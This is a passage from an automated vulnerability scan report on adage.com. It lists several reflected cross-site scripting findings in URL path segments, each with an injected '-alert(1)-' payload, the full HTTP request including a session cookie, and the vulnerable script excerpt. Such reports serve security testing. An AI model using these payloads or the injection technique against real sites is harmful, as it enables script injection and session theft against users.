Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BCCA82AECC50E38726109B077DC2398144C33DD3; path=/
Set-Cookie: HMAC=D417A05EBE9AA0550B6792126A63CC1DE9952992; path=/
Set-Cookie: HMAC=6199D14071FBC72E13BEF195546069776B73BD64; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1311609254";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom19038"-alert(1)-"34eeeccf4f1/menus/housing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.112. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/housing.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a93ec"-alert(1)-"3555ffd6f45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menusa93ec"-alert(1)-"3555ffd6f45/housing.png?1311609254 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=04215C28C6DCEF52769DA9E5721B1A40ACAFA138; path=/
Set-Cookie: HMAC=68AF018927246FDB3DB53EDA95DB75075BFDA78F; path=/
Set-Cookie: HMAC=1344219F9EE6B907EBA15C6CF83F8A833776D706; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1311609254";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menusa93ec"-alert(1)-"3555ffd6f45/housing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.df
...[SNIP]...

1.113. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/housing.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57db"-alert(1)-"c134cc6d981 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/housing.pnge57db"-alert(1)-"c134cc6d981?1311609254 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=721CDA73F1E04CA77FB1CA614E7066395F97B2FC; path=/
Set-Cookie: HMAC=28C3D9045FB95E1F1BBB0D409BE76F5D2F8883D6; path=/
Set-Cookie: HMAC=98907B2894AEDC5F4E8E9F10041041571EDB12EC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1311609254";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/housing.pnge57db"-alert(1)-"c134cc6d981"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.114. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/mediaworks.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad090"-alert(1)-"48344422a62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesad090"-alert(1)-"48344422a62/bottom/menus/mediaworks.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8A2CD49BEECCB6F4395B0984108D98BED72C52B0; path=/
Set-Cookie: HMAC=0E5C7F865ED0C2BBFDAF17ED9F19C9D14B4D3162; path=/
Set-Cookie: HMAC=C0B0D6112C07C7489ED43F973981D341D498B225; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagesad090"-alert(1)-"48344422a62/bottom/menus/mediaworks.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.
...[SNIP]...

1.115. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/mediaworks.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7ad5"-alert(1)-"ee21b03fa02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottoma7ad5"-alert(1)-"ee21b03fa02/menus/mediaworks.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B258FE9A00B70653836F6B2F87AABA7D56BB0F67; path=/
Set-Cookie: HMAC=08BD8A28870AA9E7267CA0D31DE979CD9E74B7F8; path=/
Set-Cookie: HMAC=EEAE3011D649C487E3C6A160938DE4DDF2CE7A18; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottoma7ad5"-alert(1)-"ee21b03fa02/menus/mediaworks.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js
...[SNIP]...

1.116. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/mediaworks.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab5f6"-alert(1)-"516e97c6620 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menusab5f6"-alert(1)-"516e97c6620/mediaworks.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=65012706DC3DB7B09CB4D023C190B8A633A58791; path=/
Set-Cookie: HMAC=66CD5A6ECE3872B4E665C001FDEE3D4020CCA91E; path=/
Set-Cookie: HMAC=E82F1C7007E4F66D02829EBFEB661B860D2FC484; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menusab5f6"-alert(1)-"516e97c6620/mediaworks.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx
...[SNIP]...

1.117. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/mediaworks.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2163d"-alert(1)-"47f41d3c23a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/mediaworks.png2163d"-alert(1)-"47f41d3c23a?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B3563C43C39309C2676C5BF30D68D02A57E375B3; path=/
Set-Cookie: HMAC=6E1B88897C4A3D8B78455C3E3EFF340E740E648F; path=/
Set-Cookie: HMAC=C31CE88E61DD09C9A399BBAAFE90929CB7266E14; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/mediaworks.png2163d"-alert(1)-"47f41d3c23a"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.118. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/small_agency_awards.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4392"-alert(1)-"ecfac324a76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagese4392"-alert(1)-"ecfac324a76/bottom/menus/small_agency_awards.png?1313010494 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BE03A6B74614EEE91B57370DF86E456EF87FA002; path=/
Set-Cookie: HMAC=93812CD93C72617D54648B8BE15180D8253E1F89; path=/
Set-Cookie: HMAC=6ED1F9FE764221C343383EA8D8383CE1F46568F5; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313010494";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagese4392"-alert(1)-"ecfac324a76/bottom/menus/small_agency_awards.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hb
...[SNIP]...

1.119. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/small_agency_awards.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5525"-alert(1)-"4c9c6b245a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottomd5525"-alert(1)-"4c9c6b245a8/menus/small_agency_awards.png?1313010494 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=7E4AA4A5A0979288D2128A5FBF5B692AFC71DCF8; path=/
Set-Cookie: HMAC=A7484D77740DD5D463B1EB953187B8C63F12B2A9; path=/
Set-Cookie: HMAC=4026680D05BD9E4E082200B691667C9D1255B03B; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313010494";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottomd5525"-alert(1)-"4c9c6b245a8/menus/small_agency_awards.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="
...[SNIP]...

1.120. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/small_agency_awards.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b1be"-alert(1)-"38f00f74b60 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus4b1be"-alert(1)-"38f00f74b60/small_agency_awards.png?1313010494 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=74A2DEA4FD980FE4E6E6B4A32F4856F9EBAF090F; path=/
Set-Cookie: HMAC=5BA1F15AFC20B505359A22B97DB83834D43F3890; path=/
Set-Cookie: HMAC=1396BEE6EDC26F1B0A22A508E4770099343DED8F; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313010494";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus4b1be"-alert(1)-"38f00f74b60/small_agency_awards.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,
...[SNIP]...

1.121. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/small_agency_awards.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f518"-alert(1)-"5e391f5e27c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/small_agency_awards.png2f518"-alert(1)-"5e391f5e27c?1313010494 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=4C6507D825F06396B2590E715A1A37EE07B7E29D; path=/
Set-Cookie: HMAC=984023656C4B289CB6E43E90518148B6C5764105; path=/
Set-Cookie: HMAC=261F823D365160C1568D60A04F335BF235D41401; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
x.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313010494";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/small_agency_awards.png2f518"-alert(1)-"5e391f5e27c"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.122. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/covers/current_thumb.jpg

